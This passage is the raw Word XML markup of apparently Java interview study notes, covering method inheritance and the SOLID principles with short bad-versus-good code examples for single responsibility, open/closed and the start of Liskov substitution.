          <w:numId w:val="6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f m1() is not overridden in Class B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F88BDC5" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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method from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Class A) will be called, because the method is inherited by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Class B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE5040F" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000A772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7F3A026">
          <v:rect id="_x0000_i1395" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="294C998B" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc196307610"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain SOLID Principles?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w14:paraId="7AAB28F5" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="134F3971" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>SOLID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> principles are the five key design principles in object-oriented programming (OOP) that help create </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>clean, maintainable, and scalable software</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here’s a breakdown with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>simple explanations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Java examples</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="411F98C9">
          <v:rect id="_x0000_i1396" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="615B5008" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>S – Single Responsibility Principle (SRP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A34A7" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A class should have only one reason to change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136293CF" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CD14F6"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Repor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21A9F404"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getReportData</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return</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8800"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"data"</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1002FE58"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saveToFile</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data</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writes to file */</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5DE434FB"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D1782C" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Good:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFBF48A"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Repor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68E15A0D"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getReportData</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return</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8800"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"data"</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284891BF"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030C0AE2"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ReportSaver</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000A1FF3"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saveToFile</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data</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writes to file */</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1F786853"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694707B8" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles only data, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ReportSaver</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles saving — </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>separation of concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65000954" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="743532BB">
          <v:rect id="_x0000_i1397" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D72B7D4" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>O – Open/Closed Principle (OCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45031176" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Software entities should be open for extension, but closed for modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C1C6B8" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F13512"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hapePrinter</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3D8DBE2B"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printShape</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shap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01C54E2B"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f</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shap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equals</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Circl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draw circle */</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0954733C"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els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f</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shap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equals</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Squar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draw square */</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07D56D57"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21D050FB"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF621C" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Good:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C23B691"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interfac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hap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011FD62F"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draw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D688624"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEEEE57"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023A6E0E"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Circl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mplement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hap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169CB8AD"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draw</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Drawing Circl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15657110"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF1D5F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C06A5F2"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quar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mplement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hap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16190610"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draw</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Drawing Squar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590A62C9"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7CA417"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAFF5DA"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hapePrinter</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0F776A77"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printShape</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Shape</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> shap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733C0888"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shap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draw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6120372D"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2BF1973C"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E43A320" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can add new shapes without changing </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ShapePrinter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5E3A9" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="37E8165D">
          <v:rect id="_x0000_i1398" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8B8690" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>L – Liskov Substitution Principle (LSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B616AF" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Subtypes must be substitutable for their base types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6290FF47" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E4079"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Bird</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251C6190"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fly</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4CD791AD"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Bird is flying"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC74D1"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641A16AB"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E4866C"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parro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extend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Bird</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7505B114"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76672FEB"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fly</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6FA63AB0"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Sparrow is flying"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57265691"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74D3D06A"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEF673E" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Violation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758B5BB"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Ostrich</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extend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Bird</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71407250"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Override</w:t>
      </w:r>
    </w:p>
